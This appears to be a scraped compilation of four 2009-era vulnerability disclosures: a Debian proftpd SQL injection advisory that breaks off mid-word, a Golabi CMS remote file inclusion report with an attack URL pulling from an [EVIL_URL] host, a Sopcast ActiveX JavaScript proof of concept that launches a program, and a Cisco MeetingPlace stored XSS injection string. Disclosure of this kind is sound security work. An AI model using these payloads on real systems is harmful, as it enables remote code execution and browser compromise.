SIGNATURE-
[SECURITY] [DSA 1727-1] New proftpd-dfsg packages fix SQL injection vulnerabilites
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 - -- Debian Security Advisory DSA 1727-1secur...@debian.org http://www.debian.org/security/ Steffen Joeris February 26th, 2009 http://www.debian.org/security/faq - -- Package: proftpd-dfsg Vulnerability : SQL injection vulnerabilites Problem type : remote Debian-specific: no CVE Ids: CVE-2009-0542 CVE-2009-0543 Two SQL injection vulnerabilities have been found in proftpd, a virtual-hosting FTP daemon. The Common Vulnerabilities and Exposures project identifies the following problems: CVE-2009-0542 Shino discovered that proftpd is prone to an SQL injection vulnerability via the use of certain characters in the username. CVE-2009-0543 TJ Saunders discovered that proftpd is prone to an SQL injection vulnerability due to insufficient escaping mechanisms, when multybite character encodings are used. For the stable distribution (lenny), these problems have been fixed in version 1.3.1-17lenny1. For the oldstable distribution (etch), these problems will be fixed soon. For the testing distribution (squeeze), these problems will be fixed soon. For the unstable distribution (sid), these problems have been fixed in version 1.3.2-1. We recommend that you upgrade your proftpd-dfsg package. Upgrade Instructions - wget url will fetch the file for you dpkg -i file.deb will install the referenced file. If you are using the apt-get package manager, use the line for sources.list as given at the end of this advisory: apt-get update will update the internal database apt-get upgrade will install corrected packages You may use an automated update by adding the resources from the footer to the proper configuration. Debian GNU/Linux 5.0 alias lenny - Source archives: http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-17lenny1.dsc Size/MD5 checksum: 1348 bb4118976a78b6eef4356123b4e322da http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1-17lenny1.diff.gz Size/MD5 checksum: 102388 7873fdab33c5e044dce721300d496d7e http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-dfsg_1.3.1.orig.tar.gz Size/MD5 checksum: 2662056 da40b14c5b8ec5467505c98b4ee4b7b9 Architecture independent components: http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-doc_1.3.1-17lenny1_all.deb Size/MD5 checksum: 1256300 f0e73bd54793839c802b3c3ce85bb123 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd_1.3.1-17lenny1_all.deb Size/MD5 checksum: 194896 cda6edb78e4a5ab9c8a90cfdaeb19b32 AMD64 architecture: http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny1_amd64.deb Size/MD5 checksum: 744914 4c09f5af5f825f0c068f3dce4a1c7a84 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny1_amd64.deb Size/MD5 checksum: 214334 eb8f6f56afda836f85f6d808a6086c6a http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny1_amd64.deb Size/MD5 checksum: 203878 8d13ce2c0d2c15eec496d3e014aa1ea3 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny1_amd64.deb Size/MD5 checksum: 203902 ce74fcf7e0f082fcf4454120e984a0c3 ARM architecture: http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny1_arm.deb Size/MD5 checksum: 696884 cab353aa755852b2c07916f234268e39 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny1_arm.deb Size/MD5 checksum: 213832 faad0df7dab14fdca108c6370ae3edf0 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny1_arm.deb Size/MD5 checksum: 203260 3940f22df22db3ce6a3644a22b68e82b http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgsql_1.3.1-17lenny1_arm.deb Size/MD5 checksum: 203448 35f6cb99d5f9886d74a8a1e72df36a2d Intel IA-32 architecture: http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-basic_1.3.1-17lenny1_i386.deb Size/MD5 checksum: 688540 bdcbe2b33ed58bf474824c4639dcfb99 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-ldap_1.3.1-17lenny1_i386.deb Size/MD5 checksum: 212208 bcb4bce6c950fe4fd416fcf9e97b79f6 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-mysql_1.3.1-17lenny1_i386.deb Size/MD5 checksum: 203074 55e8334da716aeb8efe43803c8f71d00 http://security.debian.org/pool/updates/main/p/proftpd-dfsg/proftpd-mod-pgs
Golabi CMS Remote File Inclusion Vulnerability
[wWw.CrazyAngel.iR] - [info-AT-CrazyAngel.iR] [Golabi CMS Remote File Inclusion Vulnerability] [+] Application Info: [*] Name: Golabi CMS [*] Author: R3dM0ve [*] HomePage: http://golabicms.sourceforge.net/ [*] Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr [+] Vulnerability Info: [*] Type: Remote File Inclusion (RFI) [*] Requirement: register_globals [ON] [*] Risk: High Critical [*] Bug Hunter: CrazyAngel [*] Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability [*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]
Sopcast SopCore Control (sopocx.ocx 3.0.3.501) SetExternalPlayer() user assisted remote code execution poc
window.onload=function() { SopPlayer.InitPlayer(); //SopPlayer.SetExternalPlayer("192.168.0.1\\c$\\PATH\\TO\\MALICIOUS_PROGRAM.EXE"); SopPlayer.SetExternalPlayer("c:\\WINDOWS\\system32\\calc.exe"); SopPlayer.SetSopAddress("sop://broker.sopcast.com:3912/6002"); //A LIVE CHANNEL ... SopPlayer.SetChannelName("CCTV5"); SopPlayer.Play(); } original url: http://retrogod.altervista.org/9sg_sopcastia.html
Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability
Title: Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability CVE Identifier: N/A Credit: Security Assurance Team of the National Australia Bank. The vendor was advised of this vulnerability prior to its public release. National Australia Bank adheres to the Guidelines for Security Vulnerability Reporting and Response V2.0 document when issuing Security Advisories. Class: Stored Cross Site Scripting Remote: Yes Local: No Vulnerable: Cisco Unified Meeting Place 6.0 and possibly 7.0 other versions may also be vulnerable. Not Vulnerable: Vendor: Cisco Discussion: Cisco Unified Meeting Place is a suite of products used for remote voice, video and web conferencing. The Cisco Unified Meeting Place web interface allows users to schedule and attend conferences. Each user has the ability to modify their own account settings such as their name, telephone extension, email address etc. National Australia Banks Security Assurance Team have identified a stored cross site scripting vulnerability that could be exploited by a malicious user to execute code within another user's browser when they view a meeting created by the malicious user. Exploit: The E-mail Address field of this profile page is vulnerable to stored cross site scripting attacks. If a user enters the following in the email field, the code within the script tags will be executed whenever that users profile data is viewed by other users, including when viewing the details of a meeting created by this user: ">INSERT JAVASCRIPT HERE Solution: No workaround available. This vulnerability is fixed in Cisco Unified MeetingPlace Web Conferencing software version 6.0(517.0) also known as Maintenance Release 4 (MR4) for the 6.0 release, and version 7.0(2) also known as Maintenance Release 1 (MR1) for the 7.0 release. References: Vendor Homepage: http://www.cisco.com